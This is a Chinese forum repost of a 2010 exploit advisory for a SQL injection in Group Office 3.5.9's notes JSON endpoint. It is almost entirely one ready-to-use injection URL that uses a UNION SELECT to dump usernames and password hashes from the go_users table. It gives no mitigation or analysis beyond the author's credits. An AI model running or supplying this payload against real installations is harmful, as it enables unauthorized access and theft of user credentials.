首页
社区
课程
招聘
[转帖][推荐]Group Office 3.5.9 SQL Injection Vulnerability
发表于: 2010-9-13 22:42 2273

[转帖][推荐]Group Office 3.5.9 SQL Injection Vulnerability

2010-9-13 22:42
2273
=====================================================================================  

Group Office (/notes/json.php?task=category&category_id) SQL Injection Vulnerability  

=====================================================================================  

   

########################################################################################  

   

Author : ViciOuS  

Author Web Page :http://www.sabotaj.in  

Email : vicious[at]sabotaj.in  

Script Page : http://www.group-office.com  

   

########################################################################################  

   

Sql Injection :  

   

http://localhost/www/groupoffice-com-3.5.9/modules/notes/json.php?task=category&category_id=999999 union(select 1,concat_ws(0x3a,username,password),3,4+from+go_users)--  

   

########################################################################################  

Thanks WwW.sabotaj.iN  

########################################################################################

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//